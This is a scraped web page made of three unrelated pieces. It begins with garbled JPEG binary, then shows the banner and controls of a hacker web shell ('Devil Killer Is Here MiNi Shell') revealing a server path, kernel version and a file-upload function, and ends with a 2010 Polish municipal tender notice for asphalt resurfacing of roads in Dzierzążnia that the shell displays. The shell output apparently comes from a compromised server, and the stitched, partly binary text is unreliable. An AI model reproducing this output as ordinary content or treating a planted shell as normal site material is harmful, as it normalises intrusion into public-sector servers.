JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100527/146144-N-2010.html

<p class="kh_header"><b>Dzierzążnia: WYKONANIE  przebudowy trzech  dróg  gminnych   w miejscowościach  KORYTOWO, NOWA DZIERZĄŻNIA, STARE GUMINO - poprzez położenie  dywaników  asfaltowych, tj.:ZADANIE I  - dł.1,10km i szer. 4,00mb,
    ZADANIE II  - dł.1,02km i szer. 4,50mb,
    ZADANIE III - dł. 577,56mb i szer.4,50mb.</b><br>
<b>Numer ogłoszenia: 146144 - 2010; data zamieszczenia: 27.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dzierzążnia , 28, 09-164 Dzierzążnia, woj. mazowieckie, tel. 023 6615904 lub 02, faks 023 6615902.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE  przebudowy trzech  dróg  gminnych   w miejscowościach  KORYTOWO, NOWA DZIERZĄŻNIA, STARE GUMINO - poprzez położenie  dywaników  asfaltowych, tj.:ZADANIE I  - dł.1,10km i szer. 4,00mb,
    ZADANIE II  - dł.1,02km i szer. 4,50mb,
    ZADANIE III - dł. 577,56mb i szer.4,50mb..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	ZADANIE  I    -   NOWE KUCICE - KORYTOWO - KADŁUBOWO (cz. z II etapu) , cz. drogi gminnej  Nr  300329W i cz. 300320W w m-ści Korytowo  -  położenie dywanika  asfaltowego  z warstwy wiążącej (4cm) i ścieralnej (4cm)  na podbudowie  z kruszywa naturalnego  (20cm + 8cm),  o  łącznej długości  1,10km   i  szer. 4,00mb.
2.	ZADANIE  II   -    NOWA  DZIERZĄŻNIA,  droga gminna  Nr  300318W  -  położenie dywanika  asfaltowego  z warstwy wiążącej (4cm) i ścieralnej (4cm)  na podbudowie           z kruszywa naturalnego  (20cm + 10cm),   o łącznej długości 1,02km i  szer. 4,50mb.
3.	 ZADANIE  III    -    STARE  GUMINO,  droga gminna  Nr  300355W  -  położenie dywanika  asfaltowego  z warstwy wiążącej (4cm) i ścieralnej (4cm)  na podbudowie z kruszywa naturalnego  (20cm),   o łącznej długości  577,56mb  i  szer. 4,50mb.

DLA  ZADANIA  nr  I - m. Korytowo:
1.	ROBOTY PRZYGOTOWAWCZE
Roboty pomiarowe   -  1,10km,
Usunięcie  warstwy ziemi urodzajnej grub. warstwy do 15cm  -  1508,00m2,
Wywóz darniny na odl.do 1km -  226,20  m3,
Mechaniczne ścinanie drzew  - 94 szt.
Wywożenie dłużyc   -  152,13m-p,
Wywożenie karpiny  -  94,00m-p,
Wywożenie gałęzi    -  94,00m-p, 
2.	ROBOTY  ZIEMNE 
     Wykopy  oraz przekopy wyk. koparkami  -  649,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi  -  857,00m3,
Nakłady uzup.do tablic za każdy rozp.1km odl.transportu ponad 1km -473,00m3,
Formowanie i zagęszczanie nasypów spycharkami 110kW - 857,00m3,
Zagęszczanie nasypów walcami samojezdnymi     -  1714,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi  -  84,16m3,
Nakłady uzup.do tablic za każdy rozp.1km odl.transportu ponad 1km -24,00m3,
Zasypanie wykopów fundamentowych podłużnych - 84,16m3,
3.  ODWODNIENIE
     Przepusty rurowe pod zjazdami, ławy fundamentowe  -  0,60m3,
Przepusty rurowe pod zjazdami, ścianki czołowe  -  2,00 szt.
     Przepusty rurowe pod zjazdami, rury betonowe  -  10,00m.
4.  PODBUDOWA
     Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne  -  5 182,75m2,
     Dolna warstwa podbudowy z kruszywa naturalnego, grub. 20cm  -  5 182,75m2.
     Górna warstwa podbudowy z kruszywa naturalnego, grub. 8cm  -   4 905,10m2.
5.  NAWIERZCHNIA
     Skropienie nawierzchni asfaltem  -  4 766,30m2,
     Wykonanie  warstwy wiążącej nawierzchni bitumicznej grub. 4 cm z mieszanki mineralno-
     asfaltowej  -  4 766,30 m2,
Skropienie nawierzchni asfaltem  -  4 627,46m2,
Nawierzchnia z mieszanki mineralno- asfaltowej grub. 4,00cm (ścieralna) -  4 627,46m2.
6.  ZJAZDY
     Przepusty rurowe pod zjazdami, ławy fundamentowe    - 1,50m3,
     Przepusty rurowe pod zjazdami,  ścianki czołowe  - 10,00szt.,
     Przepusty rurowe pod zjazdami,  rury betonowe  - 25,00m,
     Górna warstwa podbudowy z kruszywa naturalnego, grub. 15cm  - 179,50m2,
7.  ROBOTY WYKOŃCZENIOWE
     Plantowanie (obrobienie na czysto) pow. skarp i korony nasypów -  3 203,80m2,
     Pobocza z kruszywa naturalnego , grub 8cm -  1 446,70m2,
     Pobocza z kruszywa naturalnego , grub 15cm -  2 208,00m2,
8.  OZNAKOWANIE 
Ustawienie znaków drogowych na słupkach stalowych - 6 szt. 



DLA  ZADANIA  nr  II - m. Nowa Dzierzążnia

1. ROBOTY PRZYGOTOWAWCZE
Roboty pomiarowe   -  1,02km,
Usunięcie  warstwy ziemi urodzajnej grub. warstwy do 15cm  -  1 689,88m2,
Transport  darniny  -  1 689,88m2,
2. ROBOTY  ZIEMNE 
Wykopy oraz przekopy wykonywane koparkami  -  274,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi  -  304,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi z transportem urobku -  608,00m3
3.  PODBUDOWA
     Profilowanie i zagęszczanie podłoża  -  5 373,64m2,
     Dolna warstwa podbudowy z kruszywa naturalnego, grub. 10cm  -    5 373,64m2,
     Górna warstwa podbudowy z kruszywa naturalnego, grub. 20cm  -    4 757,26m2.
4.  NAWIERZCHNIA
     Skropienie nawierzchni asfaltem  -  4 634,20m2,
     Wykonanie dolnej warstwy nawierzchni bitumicznej grub. 4 cm z mieszanki mineralno-
     asfaltowej  -  4634,20m2,
Skropienie nawierzchni asfaltem  -  4 511,12m2,
Nawierzchnia z mieszanki mineralno- asfaltowej grub. 4,00cm  -  4 511,12m2.
5.  POBOCZE
     Nawierzchnia  z pospółki , grub. 8cm -  1 526,55m2,
6.  ROBOTY WYKOŃCZENIOWE
     Plantowanie (obrobienie na czysto) pow. skarp i korony nasypów -  2 178,40m2,
7.  OZNAKOWANIE 
     Pionowe znaki drogowe, słupki z rur stal. -4,00szt.
     Pionowe znaki drogowe, zakazu, nakazu, ostrzegawcze  -5,00szt.

DLA  ZADANIA  nr  III - m. Stare  Gumino
1.  ROBOTY PRZYGOTOWAWCZE

Roboty pomiarowe przy liniowych rob.ziemnych  -  0,58km,
Usunięcie  warstwy ziemi urodzajnej grub. warstwy do 15cm  -  1 155,12m2,
Transport  darniny  -  1 155,12m2,
2.  ROBOTY  ZIEMNE 
Wykopy oraz przekopy wykonywane koparkami  -  98,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi  -  162,00m3,
Roboty ziemne wyk. koparkami przedsiębiernymi z transportem urobku -  232,00m3,
Nakłady uzup.do tablic za każdy rozp.1km odl.transportu ponad 1km  232,00m3,
3.  PODBUDOWA
     Profilowanie i zagęszczanie podłoża  -  3 627,07m2,
     Dolna warstwa podbudowy z kruszywa naturalnego, grub. 20cm  -    2 633,33m2,
4.  NAWIERZCHNIA
     Skropienie nawierzchni asfaltem  -  2 564,03m2,
     Wykonanie dolnej warstwy wiążącej  grub. 4 cm z mieszanki mineralno-
     asfaltowej  -  2 564,03m2,
Skropienie nawierzchni asfaltem  -  2 494,73m2,
Nawierzchnia z mieszanki mineralno- asfaltowej grub. 4,00cm  -  2 494,73m2.
5.  POBOCZE
     Nawierzchnia  żwirowa , grub. 8cm -  808,59m2,
6.  ZJAZDY
     Nawierzchnia  żwirowa , grub. 8cm -  185,15m2,
7.  URZĄDZENIA  OBCE
Przepusty rurowe, ścianki czołowe dla rur(80) -  2,00 szt.
     Przepusty rurowe, rury betonowe  -  2,00m.
Przepusty rurowe, ścianki czołowe dla rur(50) -  6,00 szt.
     Przepusty rurowe, rury betonowe  -  6,00m.
Przepusty rurowe, ścianki czołowe dla rur(40) -  12,00 szt.
     Przepusty rurowe, rury betonowe  -  48,00m.
     Przepusty rurowe pod zjazdami, ławy fundamentowe betonowe -  0,40m3,
     Przepusty rurowe pod zjazdami, ławy fundamentowe żwirowe -  5,67m3,  
 8. ROBOTY WYKOŃCZENIOWE
     Czyszczenie rowów z wyprofilowaniem dna skarp - 252,07m,
     Czyszczenie przepustów o śr.0,5m - 11,00m,
     Czyszczenie przepustów o śr.0,8m - 6,50m
     Plantowanie (obrobienie na czysto) pow. skarp i korony nasypów -  875,10m2,
     Plantowanie (obrobienie na czysto) pow. skarp i korony nasypów(ręcznie) -  242,60m2,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa     w art. 67 ust. 1 pkt. 6  ustawy Prawo Zamówień Publicznych w kwocie nie przekraczającej 50% zamówienia podstawowego w zakresie zgodnym z przedmiotem zamówienia w okresie do 3 lat od udzielenia zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10 000,00zł.
(słownie: dziesięć tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b.	posiadania wiedzy i doświadczenia lub przedstawią pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji swojej wiedzy i doświadczenia
-   Wykonawca musi wykazać, że w okresie ostatnich 5 lat, przed dniem wszczęcia postępowania o udzielenie zamówienia , a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, zrealizował(zakończył)   minimum 2 zadania obejmujące wykonanie robót o podobnym charakterze i złożoności co przedmiot zamówienia 
 o wartości zadania nie mniejszej niż 500 000,-zł (każde zadanie),
Ocena spełniania ww. warunków określonych dla wykonawców będzie dokonywana zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach          i oświadczeniach wyszczególnionych w pkt. F niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować następującym wyposażeniem technicznym: 
samochód ciężarowy samowyładowczy o ład. min 7,5 t. - 2szt.,
koparko-ładowarka - 1szt.
walec stalowy gładki(8-10)ton - 1szt.
układarka mas bitumicznych - 1szt.
Ocena spełniania ww. warunków określonych dla wykonawców będzie dokonywana zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach          i oświadczeniach wyszczególnionych w pkt. F niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać kierownictwo robót posiadające uprawnienia budowlane wymagane przepisami ustawy Prawo budowlane.
Ocena spełniania ww. warunków określonych dla wykonawców będzie dokonywana zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach          i oświadczeniach wyszczególnionych w pkt. F niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca musi posiadać opłacone ubezpieczenie od odpowiedzialności cywilnej  
    w zakresie prowadzonej działalności na kwotę nie mniejszą niż 500 000,00 zł,
Ocena spełniania ww. warunków określonych dla wykonawców będzie dokonywana zgodnie z formułą spełnia / nie spełnia, w oparciu o informacje zawarte w dokumentach          i oświadczeniach wyszczególnionych w pkt. F niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełnione formularze ofertowe  (na 3 zadania kosztorysy ofertowe),
Zaakceptowany projekt umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Okoliczności i warunki na jakich zamawiający zamierza dokonywać zmian zawartej 
           umowy   podczas realizacji inwestycji:
a.	Nie ujęte (nie zinwentaryzowane) uzbrojenie podziemne, które nie zostało uwzględnione na mapach do celów projektowych, poprzez zmianę terminu realizacji zamówienia o okres zatrzymania robót z tej przyczyny. 
b.	Związane z zatrzymaniem robót przez urzędy Nadzoru Budowlanego, poprzez zmianę terminu realizacji zamówienia.
c.	Związane z odkryciem w gruncie przedmiotów niemożliwych do zidentyfikowania przed przystąpieniem do robót budowlanych takich jak m.in. głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków, poprzez zmianę terminu realizacji zamówienia.
